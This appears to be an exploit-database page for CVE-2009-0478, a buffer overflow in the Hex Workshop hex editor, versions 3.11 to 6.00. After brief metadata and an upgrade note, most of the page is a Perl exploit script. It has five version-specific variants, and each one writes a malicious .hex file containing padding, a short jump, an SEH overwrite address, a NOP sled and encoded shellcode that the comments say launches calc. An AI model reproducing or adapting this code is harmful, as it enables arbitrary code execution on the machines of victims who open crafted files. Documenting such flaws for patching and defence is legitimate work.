Hex Workshop v3//4//5//6 (.hex) Universal Local Buffer ExploitS (SEH)

vendor:

Hex Workshop

by:

DATA_SNIPER

7,8

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Hex Workshop

Affected Version From: 3.11

Affected Version To: 6.00

Patch Exists: YES

Related CWE: CVE-2009-0478

CPE: a:bpsoft:hex_workshop

Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-vid-9c2460a4-f6b1-11dd-94d9-0030843d3802/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-0478/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-0478/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Hex Workshop v3//4//5//6 (.hex) Universal Local Buffer ExploitS (SEH)

Hex Workshop is a hexadecimal editor that allows users to edit binary files. A buffer overflow vulnerability exists in Hex Workshop versions 3, 4, 5, and 6. An attacker can exploit this vulnerability by sending a specially crafted .hex file to the victim, which can lead to arbitrary code execution. The vulnerability is due to insufficient bounds checking when processing the .hex file.

Mitigation:

Upgrade to the latest version of Hex Workshop.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# Hex Workshop v3//4//5//6 (.hex) Universal Local Buffer ExploitS (SEH)
# Found By: DATA_SNIPER
# http://www.bpsoft.com/downloads/
######################################################################################
##info:: i write 3 exploits for the 3 v
######################################################################################
# USE>>file>>import>>hack4love.hex>> boom calc
######################################################################################
#
#Hex Workshop v 3.11
#
######################################################################################
my $hed1=":0000FC...";
my $hed2="\n:";
my $bof="41" x 172;
my $nsh="EB069090";
my $seh="62380012";
my $nop="90" x 20;
my $sec=
"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";

print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
#######################################################################################
open(myfile,'>> HACK4LOVE.hex');
print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
######################################################################################
######################################################################################
######################################################################################
######################################################################################
#
#Hex Workshop V 4.00 // v 4.20
#
######################################################################################
my $hed1=":0000FC...";
my $hed2="\n:";
my $bof="41" x 172;
my $nsh="EB069090";
my $seh="62380012";
my $nop="90" x 20;
my $sec=
"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";

print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;

######################################################################################
open(myfile,'>> HACK4LOVE.hex');
print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
######################################################################################
######################################################################################
######################################################################################
#
#Hex Workshop V 4.21 // 4.22 // 4.23
#
######################################################################################
my $hed1=":0000FC...";
my $hed2="\n:";
my $bof="41" x 176;
my $nsh="EB069090";
my $seh="8c29d374";
my $nop="90" x 20;
my $sec=
"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";

print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;

######################################################################################
open(myfile,'>> HACK4LOVwwE.hex');
print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
######################################################################################
######################################################################################
######################################################################################
######################################################################################
#
#Hex Workshop v 5
#v5.0 beta 1//v5.0.0.2511//v5.0.1.272//v5.0.2.2769//v5.1.1.3963/v5.1.3.4159/v5.1.4.4188
#
######################################################################################
my $hed1=":0000FC...";
my $hed2="\n:";
my $bof="41" x 172;
my $nsh="EB069090";
my $seh="38f8d374";
my $nop="90" x 20;
my $sec=
"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";

print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
#######################################################################################
open(myfile,'>> HACK4LOsssVE.hex');
print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
#######################################################################################
#######################################################################################
#######################################################################################
#######################################################################################
#
#Hex Workshop v6.0.0.4582 //v6.0.1.4603
#
#######################################################################################
#######################################################################################
my $hed1=":0000FC...";
my $hed2="\n:";
my $bof="41" x 2228;
my $nsh="EB069090";
my $seh="38f8d374";
my $nop="90" x 20;
my $sec=
"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302";

print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;

#########################################################################################
open(myfile,'>> HACK4LOVE.hex');
print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec;
#######################################################################################

# milw0rm.com [2009-08-31]